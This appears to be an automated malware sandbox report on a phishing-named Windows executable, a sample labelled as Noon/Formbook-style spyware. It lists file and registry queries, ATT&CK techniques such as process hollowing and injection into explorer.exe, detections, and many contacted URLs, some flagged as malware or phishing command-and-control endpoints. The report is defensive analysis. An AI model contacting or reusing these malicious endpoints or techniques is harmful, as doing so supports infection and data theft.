        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information


        Remote Access Functionality

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
        Execution: 1 Shared Modules; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
        Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Privilege Escalation: 612 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 612 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 1 Rundll32; 13 Software Packing; 1 File Deletion
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
        Discovery: 221 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 112 System Information Discovery; System Owner/User Discovery; Network Sniffing; Network Service Scanning; System Network Connections Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
        Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
        Behavior Graph ID: 633628, Sample: PO-INQUIRY-VALE-SP-2022-60.exe, Startdate: 25/05/2022, Architecture: WINDOWS, Score: 100
        Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
        PO-INQUIRY-VALE-SP-2022-60.exe (started)
          Dropped: C:\...\PO-INQUIRY-VALE-SP-2022-60.exe.log, ASCII
          Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
          PO-INQUIRY-VALE-SP-2022-60.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            explorer.exe (injected)
              DNS/IP: www.iguaym.com 156.226.250.150, 49796, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; deta-hedman.com 37.97.135.188, 49790, 80 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands; 31 other IPs or domains
              Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
              rundll32.exe (started)
                Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                  conhost.exe (started)

        Source | Detection | Scanner | Label
        PO-INQUIRY-VALE-SP-2022-60.exe | 18% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
        PO-INQUIRY-VALE-SP-2022-60.exe | 100% | Joe Sandbox ML |

        No Antivirus matches

        Source | Detection | Scanner | Label
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.theminercrypto.com/j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh0%Avira URL Cloudsafe
        http://www.tiro.comnt0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT100%Avira URL Cloudmalware
        http://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh100%Avira URL Cloudphishing
        www.jupiter-directory.info/j86w/100%Avira URL Cloudmalware
        http://www.pieprop.com/j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.combute0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.medicaleducationbangladesh.com/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj0%Avira URL Cloudsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.sajatypeworks.comal10%Avira URL Cloudsafe
        http://www.tsreaur.com/j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.danilhodoekhi.com/j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.popcornpor.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm100%Avira URL Cloudphishing
        http://www.jamiebakes.net/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn_0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sajatypeworks.comh0%Avira URL Cloudsafe
        http://www.jamiebakes.net/j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.agfamonotype.0%URL Reputationsafe
        http://www.sajatypeworks.comu0%Avira URL Cloudsafe
        http://www.trustedhomebuying.com/j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.heiboard.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT0%Avira URL Cloudsafe
        http://www.fontbureau.coma0%URL Reputationsafe
        http://www.heiboard.xyz/j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.burntkeroseneblueheelers.com/j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh100%Avira URL Cloudmalware
        http://www.founder.com.cn/cn10%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.jupiter-directory.info/j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT100%Avira URL Cloudmalware
        http://www.sajatypeworks.comse0%Avira URL Cloudsafe
        http://www.tiro.comslntF0%Avira URL Cloudsafe
        http://www.fontbureau.comlvfet0%URL Reputationsafe
        http://www.sajatypeworks.comurs0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.fontbureau.como0%URL Reputationsafe
        http://www.popcornpor.xyz/j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT100%Avira URL Cloudphishing
        http://www.funserve.club/j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
